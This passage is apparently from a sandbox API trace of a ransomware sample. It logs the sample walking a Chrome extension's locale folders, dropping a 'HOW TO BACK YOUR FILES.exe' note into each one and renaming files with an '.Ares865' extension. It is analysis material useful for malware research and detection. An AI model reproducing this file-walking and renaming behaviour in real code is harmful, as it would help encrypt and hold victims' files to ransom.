returned="hr" [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2460 [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e23f8 [0101.602] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2468 | out: ListHead=0x2e7710, ListEntry=0x2d2468) returned 0x2d2528 [0101.602] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu", cAlternateFileName="")) returned 1 [0101.602] lstrcmpiW (lpString1="hu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.602] lstrcmpiW (lpString1="hu", lpString2="aoldtz.exe") returned 1 [0101.602] lstrcpyW (in: lpString1=0x2cce510, lpString2="hu" | out: lpString1="hu") returned="hu" [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e2520 [0101.602] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2488 | out: ListHead=0x2e7710, ListEntry=0x2d2488) returned 0x2d2468 [0101.602] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hy", cAlternateFileName="")) returned 1 [0101.602] lstrcmpiW (lpString1="hy", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.602] lstrcmpiW (lpString1="hy", lpString2="aoldtz.exe") returned 1 [0101.602] lstrcpyW (in: lpString1=0x2cce510, lpString2="hy" | out: lpString1="hy") returned="hy" [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x324fc8 [0101.602] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2348 | out: ListHead=0x2e7710, ListEntry=0x2d2348) returned 0x2d2488 [0101.602] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0101.602] lstrcmpiW (lpString1="id", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.602] lstrcmpiW (lpString1="id", lpString2="aoldtz.exe") returned 1 [0101.602] lstrcpyW (in: lpString1=0x2cce510, lpString2="id" | out: lpString1="id") returned="id" [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25c0 [0101.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x3250f0 [0101.602] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25c8 | out: ListHead=0x2e7710, ListEntry=0x2d25c8) returned 0x2d2348 [0101.602] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7d5120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7d5120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="is", cAlternateFileName="")) returned 1 [0101.602] lstrcmpiW (lpString1="is", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.603] lstrcmpiW (lpString1="is", lpString2="aoldtz.exe") returned 1 [0101.603] lstrcpyW (in: lpString1=0x2cce510, lpString2="is" | out: lpString1="is") returned="is" [0101.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0101.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325218 [0101.603] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d22e8 | out: ListHead=0x2e7710, ListEntry=0x2d22e8) returned 0x2d25c8 [0101.603] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7d5120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7d5120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0101.603] lstrcmpiW (lpString1="it", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.603] lstrcmpiW (lpString1="it", lpString2="aoldtz.exe") returned 1 [0101.603] lstrcpyW (in: lpString1=0x2cce510, lpString2="it" | out: lpString1="it") returned="it" [0101.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2540 [0101.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325340 [0101.603] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2548 | out: ListHead=0x2e7710, ListEntry=0x2d2548) returned 0x2d22e8 [0101.603] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7d5120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7d5120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iw", cAlternateFileName="")) returned 1 [0101.603] lstrcmpiW (lpString1="iw", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.603] lstrcmpiW (lpString1="iw", lpString2="aoldtz.exe") returned 1 [0101.603] lstrcpyW (in: lpString1=0x2cce510, lpString2="iw" | out: lpString1="iw") returned="iw" [0101.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24c0 [0101.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325468 [0101.603] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d24c8 | out: ListHead=0x2e7710, ListEntry=0x2d24c8) returned 0x2d2548 [0101.603] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0101.603] lstrcmpiW (lpString1="ja", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.603] lstrcmpiW (lpString1="ja", lpString2="aoldtz.exe") returned 1 [0101.603] lstrcpyW (in: lpString1=0x2cce510, lpString2="ja" | out: lpString1="ja") returned="ja" [0101.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24e0 [0101.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325590 [0101.604] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d24e8 | out: ListHead=0x2e7710, ListEntry=0x2d24e8) returned 0x2d24c8 [0101.604] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ka", cAlternateFileName="")) returned 1 [0101.604] lstrcmpiW (lpString1="ka", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.604] lstrcmpiW (lpString1="ka", lpString2="aoldtz.exe") returned 1 [0101.604] lstrcpyW (in: lpString1=0x2cce510, lpString2="ka" | out: lpString1="ka") returned="ka" [0101.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2500 [0101.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x3256b8 [0101.604] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2508 | out: ListHead=0x2e7710, ListEntry=0x2d2508) returned 0x2d24e8 [0101.604] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="km", cAlternateFileName="")) returned 1 [0101.604] lstrcmpiW (lpString1="km", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.604] lstrcmpiW (lpString1="km", lpString2="aoldtz.exe") returned 1 [0101.604] lstrcpyW (in: lpString1=0x2cce510, lpString2="km" | out: lpString1="km") returned="km" [0101.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2640 [0101.604] lstrcpyW (in: lpString1=0x2cce510, lpString2="kn" | out: lpString1="kn") returned="kn" [0101.604] lstrcpyW (in: lpString1=0x2cce510, lpString2="ko" | out: lpString1="ko") returned="ko" [0101.604] lstrcpyW (in: lpString1=0x2cce510, lpString2="lo" | out: lpString1="lo") returned="lo" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="lt" | out: lpString1="lt") returned="lt" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="lv" | out: lpString1="lv") returned="lv" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="ml" | out: lpString1="ml") returned="ml" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="mn" | out: lpString1="mn") returned="mn" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="mr" | out: lpString1="mr") returned="mr" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="ms" | out: lpString1="ms") returned="ms" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="ne" | out: lpString1="ne") returned="ne" [0101.605] lstrcpyW (in: lpString1=0x2cce510, lpString2="nl" | out: lpString1="nl") returned="nl" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="no" | out: lpString1="no") returned="no" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="pl" | out: lpString1="pl") returned="pl" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="pt_BR" | out: lpString1="pt_BR") returned="pt_BR" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="pt_PT" | out: lpString1="pt_PT") returned="pt_PT" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="ro" | out: lpString1="ro") returned="ro" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="ru" | out: lpString1="ru") returned="ru" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="si" | out: lpString1="si") returned="si" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="sk" | out: lpString1="sk") returned="sk" [0101.606] lstrcpyW (in: lpString1=0x2cce510, lpString2="sl" | out: lpString1="sl") returned="sl" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="sr" | out: lpString1="sr") returned="sr" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="sv" | out: lpString1="sv") returned="sv" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="sw" | out: lpString1="sw") returned="sw" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="ta" | out: lpString1="ta") returned="ta" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="te" | out: lpString1="te") returned="te" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="th" | out: lpString1="th") returned="th" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="tr" | out: lpString1="tr") returned="tr" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="uk" | out: lpString1="uk") returned="uk" [0101.607] lstrcpyW (in: lpString1=0x2cce510, lpString2="ur" | out: lpString1="ur") returned="ur" [0101.608] lstrcpyW (in: lpString1=0x2cce510, lpString2="vi" | out: lpString1="vi") returned="vi" [0101.608] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_CN" | out: lpString1="zh_CN") returned="zh_CN" [0101.608] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_HK" | out: lpString1="zh_HK") returned="zh_HK" [0101.608] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_TW" | out: lpString1="zh_TW") returned="zh_TW" [0101.608] lstrcpyW (in: lpString1=0x2cce510, lpString2="zu" | out: lpString1="zu") returned="zu" [0101.608] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu" [0101.608] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu" [0101.608] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.608] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.609] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.609] GetLastError () returned 0x0 [0101.609] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fec7e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e632200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e632200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.610] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.610] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.610] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.610] lstrlenW (lpString="messages.json") returned 13 [0101.610] lstrlenW (lpString="Ares865") returned 7 [0101.610] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.610] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.Ares865") returned 160 [0101.610] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.611] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.612] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=194) returned 1 [0101.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW" [0101.615] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW" [0101.615] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.615] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.616] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.616] GetLastError () returned 0x0 [0101.616] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.616] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85fec7e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e632200, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e632200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.616] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.616] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.616] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.616] lstrlenW (lpString="messages.json") returned 13 [0101.616] lstrlenW (lpString="Ares865") returned 7 [0101.616] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.617] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.Ares865") returned 163 [0101.617] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.618] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=170) returned 1 [0101.621] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK" [0101.621] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK" [0101.621] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" 